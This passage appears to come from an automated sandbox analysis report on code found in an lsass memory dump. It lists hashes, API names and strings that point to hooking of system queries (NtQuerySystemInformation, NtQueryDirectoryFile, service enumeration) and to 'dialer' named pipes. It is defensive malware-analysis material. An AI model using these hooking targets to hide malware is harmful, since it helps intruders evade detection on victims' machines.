                                                                          • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

                                                                          Control-flow Graph

                                                                          • Control-flow graph data omitted (graph of the function starting at 140ae862b2c; API calls named in the graph: GetModuleHandleA, StrCmpNIW, lstrlenW)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                          • String ID: F]:82
                                                                          • API String ID: 1239891234-2422748741
                                                                          • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction ID: f4b3617ef55b8c279f228a1357564ad9138b4f9cc27f1e8a361b5862f6d2fb0c
                                                                          • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                          • Instruction Fuzzy Hash: 9C314E32654B8086EB619F26E8403DE73A4F789764F600125EF9D47BB8EF38C945CB81
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: eaf29793312f880262aa33c4d225e9377ef8ac7c3781aeeffa93a87445d713dc
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: B5516C32640B8486EB56CF62E54839AB7A1F78DBA9F244124DF4D07B29DF3CC445C791

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 2267be31c3c8b37de2fa04f2787d19f37c5545ab8d6e24567a23a1f44e334d39
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: 3531A574580B4AA0EA07EB6BE8516E47321BB5D3B4FF05413AE0D131B69F788E49C3D2

                                                                          Control-flow Graph

                                                                          • Control-flow graph data omitted (graph of the function starting at 140adfc6910; CRT symbols named in the graph: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: 79a856343edf9d6588f3d0cd2b4f253cfe509a1624521d714eea0eda72951458
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: FC81E23162834987F656AB6798403DB72A3EF8D784F3440259B69477B6DB38C867B300

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000140AE86CE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CEBC
                                                                          • SetLastError.KERNEL32 ref: 00000140AE86CED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000140AE86ECCC,?,?,?,?,00000140AE86BF9F,?,?,?,?,?,00000140AE867AB0), ref: 00000140AE86CF2C
                                                                            • Part of subcall function 00000140AE86D6CC: HeapAlloc.KERNEL32 ref: 00000140AE86D721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF54
                                                                            • Part of subcall function 00000140AE86D744: HeapFree.KERNEL32 ref: 00000140AE86D75A
                                                                            • Part of subcall function 00000140AE86D744: GetLastError.KERNEL32 ref: 00000140AE86D764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000140AE870A6B,?,?,?,00000140AE87045C,?,?,?,00000140AE86C84F), ref: 00000140AE86CF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: b2b40885048b18a77dd749f130d094d7928ae544b3603784d23cb63539606b23
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: 0941183028174441FA6BAB6799553E922926B5C7B0F744B24AF3E4B6F6DE789C01C2C3

                                                                          Control-flow Graph

                                                                          • Control-flow graph data omitted (graph of the function starting at 140ae86a544; no API calls named in the graph, internal calls only)
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: F]:82$csm$csm$csm
                                                                          • API String ID: 849930591-967428003
                                                                          • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction ID: 7b4ba636362c0b5caa681dd8b7c7e919a21c7b74d1dcc59cd2284cb1c0ce2a62
                                                                          • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                          • Instruction Fuzzy Hash: 80E1B5726447408AEB62DF66D4803DD77A0F74DBA8F200156EF9D57BA9CB38C881D782

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: F]:82$api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-3388934289
                                                                          • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction ID: 54f3c5caea9a3c542447f16078fc342d6fc1075fabbd0ba72b9af9b604dcfd33
                                                                          • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                          • Instruction Fuzzy Hash: 0A41AE32391B0082EB27CF17A9047D56391BB4DBB0F7945259E0E97BA4EE38CC45D392

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: d526e0782f541ea269add2dfc30b9375b8e19e2713657146a865421fd34f2e67
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: FB213936654B40C2EB11CB26E54839A77A1F789BA4F600215EF5D03BB8CF3CC949CB41
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID: F]:82
                                                                          • API String ID: 1666949209-2422748741
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000140AE86C7DE,?,?,?,?,?,?,?,?,00000140AE86CF9D,?,?,00000001), ref: 00000140AE86D0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: F]:82$F]:82$F]:82$F]:82$F]:82
                                                                          • API String ID: 3215553584-1326181600
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID: F]:82
                                                                          • API String ID: 2718003287-2422748741
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID: F]:82
                                                                          • API String ID: 2933794660-2422748741
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 73fda85837acdd30ad006dc6ccb1667200e15de9212539d4e27f8f5c03466d3a
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 2702FA32259B8486EB61DB56F49439AB7A1F7C8794F200415EB8E87BB8DF7CC844CB41
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: 819f4eb226d638b22eb9453569fbd0dff2ed878ae5cb7d9cc285f1354ad887c7
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 9B61C536559B44C6E7629B16F48439AB7A0F7887A4F600515EF8E47BB8DF7CC840CB82
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 2e1910b8291bafd17102f3214c72d3e729590e13e78c3872cab4fc5f060f1e3e
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 22115472614B5353FA56162AE4553EB31C36F5C37CF784628AFE6076F68A34E8436200
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 28d524a13795f3523b3f1b4b207150eb2f338f5cab7179f9a4c1ef00b7941454
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: DC119132AD0B5011F667256AD4913E531446B6DBB8F390624AF7E176F68B34CC41C2A2
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3285030021.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 48ac8b7a938d00f4a24374fee49c64dd94bfb0dfea2bd827f35d3ab40a9a7452
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 3961B43652234853FA6B8B67E5443EBBAA3EF8D748F744415CB46077B4DB34C967A200
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000027.00000002.3288679621.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_39_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 1c54ac8669fca167ed3fb4a5461af2b1e7039b1515757cf07daf6e620200d245
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: B6619F33640B848AEB11DF66D4403DD77A0F748BA8F244256EF4E17BA9DB38C995C781
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
